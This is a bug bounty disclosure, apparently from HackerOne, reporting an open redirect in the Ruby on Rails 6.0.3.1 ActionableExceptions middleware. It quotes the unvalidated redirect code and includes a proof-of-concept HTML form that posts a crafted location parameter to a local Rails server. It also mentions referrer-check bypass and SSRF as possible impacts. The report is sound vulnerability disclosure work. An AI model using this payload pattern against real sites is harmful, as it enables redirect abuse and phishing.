Lucene search

Ooooooo_qH1:904059

HistoryJun 21, 2020 - 2:15 a.m.

Ruby on Rails: Open Redirect (6.0.0 < rails < 6.0.3.2)

2020-06-2102:15:14

ooooooo_q

hackerone.com

$1000

174

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.001 Low

EPSS

Percentile

35.2%

JSON

Hello,
I was looking at the change log (https://github.com/rails/rails/commit/2121b9d20b60ed503aa041ef7b926d331ed79fc2) for CVE-2020-8185 and found another problem existed.

https://github.com/rails/rails/blob/v6.0.3.1/actionpack/lib/action_dispatch/middleware/actionable_exceptions.rb#L21

  redirect_to request.params[:location]
end

private
  def actionable_request?(request)
    request.show_exceptions? && request.post? && request.path == endpoint
  end

  def redirect_to(location)
    body = "&lt;html&gt;&lt;body&gt;You are being <a href>redirected</a>.&lt;/body&gt;&lt;/html&gt;"

    [302, {
      "Content-Type" =&gt; "text/html; charset=#{Response.default_charset}",
      "Content-Length" =&gt; body.bytesize.to_s,
      "Location" =&gt; location,
    }, [body]]
  end

There was an open redirect issue because the request parameter location was not validated.
In 6.0.3.2, since the condition of actionable_request? has changed, this problem is less likely to occur.

PoC

1. Prepare server

Prepare an attackable 6.0.3.1 version of Rails server

❯ rails -v
Rails 6.0.3.1

❯ RAILS_ENV=production rails s
...
* Environment: production
* Listening on tcp://0.0.0.0:3000

2. Attack server

Prepare the server for attack on another port.

&lt;form method="post" action="http://localhost:3000/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=https://www.hackerone.com/"&gt;
	&lt;button type="submit"&gt;click!&lt;/button&gt;
&lt;/form&gt;

python3 -m http.server 8000

3. Open browser

Open the http://localhost:8000/attack.html url in your browser and click the button.
Redirect to https://www.hackerone.com/ url.

{F876518}

Impact

It will be fixed with 6.0.3.2 as with CVE-2020-8185(https://groups.google.com/g/rubyonrails-security/c/pAe9EV8gbM0), but I think it is necessary to announce it again because the range of influence is different.

This open redirect changes from POST method to Get Method, so it may be difficult to use for phishing.On the other hand, it may affect bypass of referrer check or SSRF.